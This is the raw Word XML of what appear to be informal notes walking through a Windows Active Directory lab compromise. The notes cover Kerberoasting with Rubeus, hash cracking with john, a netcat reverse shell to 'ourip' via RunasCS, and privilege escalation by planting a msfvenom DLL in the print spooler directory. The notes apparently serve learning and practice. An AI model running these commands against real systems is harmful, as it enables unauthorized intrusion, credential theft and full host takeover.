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58D834FA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proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B646C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5308B296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AB71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B71B8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AB71B8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AB71B8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AB71B8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AB71B8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AB71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B71B8"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30934EB0" w:rsidR="00843DCE" w:rsidRDefault="007B646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we have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svc_user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and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we  see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whoami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/all = svc-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mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61D0CEF2" w14:textId="16E4F0CC" w:rsidR="007B646C" w:rsidRDefault="007B646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use powerview.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A945E" w14:textId="77777777" w:rsidR="00553D14" w:rsidRDefault="00553D14" w:rsidP="00553D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7409F8AC" w14:textId="7611974C" w:rsidR="007B646C" w:rsidRDefault="00553D1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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63B552B4" w14:textId="27F00DB2" w:rsidR="007B646C" w:rsidRDefault="007B646C" w:rsidP="00553D1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Rubeus.exe sent to the shell</w:t>
      </w:r>
      <w:r w:rsidR="007C3B1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="007C3B1E" w:rsidRPr="006A36C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip/rubeus.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C3B1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o .\rubeus.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443061E" w14:textId="3B0BC03C" w:rsidR="007B646C" w:rsidRDefault="007B646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.\rubues.exe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kerberoast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nowrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917294">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = to do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917294">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kerbrute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917294">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> its important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1466E" w14:textId="79F1B233" w:rsidR="00917294" w:rsidRDefault="0091729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we get the hash of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svc_mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="10C2913E" w:rsidR="00843DCE" w:rsidRDefault="007C44A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crack that hash with john hashes rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D72D2" w14:textId="77777777" w:rsidR="00D17224" w:rsidRDefault="00D17224" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF25836" w14:textId="3AF91A2D" w:rsidR="00D17224" w:rsidRDefault="00385E2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IF WE HAVE ANOTHER USER ID AND PASSWORD BUT WE WANT SHALL FROM SHELL SO DO THIS. IT DIRECTLY PROVIDE SHELL OF THAT USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2B061" w14:textId="2B276758" w:rsidR="00C26B8E" w:rsidRDefault="00C26B8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Locate Invoke-RunasCS.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205718E0" w14:textId="60472979" w:rsidR="00C26B8E" w:rsidRDefault="00C26B8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sent to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2AC61B" w14:textId="3C9284AA" w:rsidR="00696AC8" w:rsidRDefault="00696AC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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006A36C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our-ip:Invoke-RunasCS.ps1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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00696AC8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Invoke-RunasCS.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA7A76" w14:textId="4BA11DCA" w:rsidR="008A0A0B" w:rsidRDefault="008A0A0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Import-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="008A0A0B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Invoke-RunasCS.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27491522" w14:textId="7E292EFD" w:rsidR="008A0A0B" w:rsidRDefault="00F30A4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Invoke-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RunasCS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svc_mysql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password</w:t>
      </w:r>
      <w:r w:rsidR="00274EBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘c:/pathtonc.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00274EBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ourip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00274EBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 -e cmd.exe’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBBAB2E" w14:textId="76253E64" w:rsidR="00F30A4E" w:rsidRDefault="00274EBB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lvnp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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264CD06" w14:textId="77777777" w:rsidR="00F30A4E" w:rsidRDefault="00F30A4E" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2FC737" w14:textId="77777777" w:rsidR="00274EBB" w:rsidRDefault="00274EBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F90F9BE" w14:textId="77777777" w:rsidR="00274EBB" w:rsidRDefault="00274EBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15EAD9AB" w14:textId="77777777" w:rsidR="00274EBB" w:rsidRDefault="00274EBB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFA8E98" w14:textId="77777777" w:rsidR="008A0A0B" w:rsidRDefault="008A0A0B" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D122DE8" w14:textId="77777777" w:rsidR="008A0A0B" w:rsidRDefault="008A0A0B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33B3900" w14:textId="27D5FE06" w:rsidR="004206D6" w:rsidRDefault="004206D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for privilege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whoami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priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D336A9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="00D336A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeChnageNotifyPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ACCB8B1" w14:textId="541AC4A6" w:rsidR="00D336A9" w:rsidRDefault="0084213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download </w:t>
      </w:r>
      <w:r w:rsidR="00990E61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeManagerVolumeExploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81CA73" w14:textId="7D410C22" w:rsidR="00842136" w:rsidRDefault="006520A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sent to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A60C92" w14:textId="336F6FDA" w:rsidR="006520A4" w:rsidRDefault="00990E6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 after upload that file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326AFE1A" w14:textId="17B2FA6B" w:rsidR="00990E61" w:rsidRDefault="00990E6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net start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52640951" w14:textId="2986C31F" w:rsidR="00990E61" w:rsidRDefault="00990E6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.\</w:t>
      </w:r>
      <w:r w:rsidRPr="00990E61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SeManagerVolumeExploit.exe = we see 917 entries </w:t>
      </w:r>
      <w:r w:rsidR="00EA41CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D634F" w14:textId="39AE4C7E" w:rsidR="00EA41CB" w:rsidRDefault="00EA41C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terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FD385" w14:textId="4DB5DF02" w:rsidR="00EA41CB" w:rsidRDefault="00EA41CB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msfvenom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-a x64 -p windows/x64/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shell_reverse_tcp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LHOST=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ourip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LPORT=5555 -f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dll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-o Printconfig.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793FA026" w14:textId="0FAD2920" w:rsidR="002807F9" w:rsidRDefault="002807F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sent to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47494210" w14:textId="04853156" w:rsidR="002807F9" w:rsidRDefault="000E35C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copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5FE0E" w14:textId="3217F1E8" w:rsidR="00990E61" w:rsidRDefault="000E35CC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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B3530D5" w14:textId="0FC2F95A" w:rsidR="000E35CC" w:rsidRDefault="000E35C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$type = [Type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetTypeFromCLSID(“{854A20FB-2D44-457D-992F-EF13785D2B51}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155C9EC" w14:textId="493DC8FF" w:rsidR="00BB036F" w:rsidRDefault="00BB036F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lvnp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5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FFC38" w14:textId="7B575B48" w:rsidR="000E35CC" w:rsidRDefault="000E35C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$object = [Activator</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FCCA2A" w14:textId="53CA0019" w:rsidR="00D336A9" w:rsidRDefault="00BB036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are root with new shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D0CC1" w14:textId="77777777" w:rsidR="00D336A9" w:rsidRDefault="00D336A9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5074E486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4214A56" w14:textId="5BE3E27E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9. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24340E45" w14:textId="77777777" w:rsidR="004206D6" w:rsidRDefault="004206D6" w:rsidP="004206D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just to be make sure that we can use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runas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cmd.exe also as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C142B8E" w14:textId="77777777" w:rsidR="004206D6" w:rsidRDefault="004206D6" w:rsidP="004206D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sent cmd.exe to shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7D329" w14:textId="77777777" w:rsidR="004206D6" w:rsidRDefault="004206D6" w:rsidP="004206D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runas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user:USERNAME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“C:\\path to program.exe”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0E35CC"/>
    <w:rsid w:val="001C02FB"/>
    <w:rsid w:val="00274EBB"/>
    <w:rsid w:val="002807F9"/>
    <w:rsid w:val="00385E23"/>
    <w:rsid w:val="004206D6"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00553D14"/>
    <w:rsid w:val="0061003F"/>
    <w:rsid w:val="006520A4"/>
    <w:rsid w:val="00696AC8"/>
    <w:rsid w:val="007B646C"/>
    <w:rsid w:val="007C3B1E"/>
    <w:rsid w:val="007C44A0"/>
    <w:rsid w:val="00842136"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008A0A0B"/>
    <w:rsid w:val="008C5E6C"/>
    <w:rsid w:val="00917294"/>
    <w:rsid w:val="00990E61"/>
    <w:rsid w:val="009F5014"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AB71B8"/>
    <w:rsid w:val="00BB036F"/>
    <w:rsid w:val="00C26B8E"/>
    <w:rsid w:val="00C42F74"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D17224"/>
    <w:rsid w:val="00D336A9"/>
    <w:rsid w:val="00EA41CB"/>
    <w:rsid w:val="00F026C4"/>
    <w:rsid w:val="00F30A4E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B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our-ip:Invoke-RunasCS.ps1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://our_ip/rubeus.ex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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-19T17:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>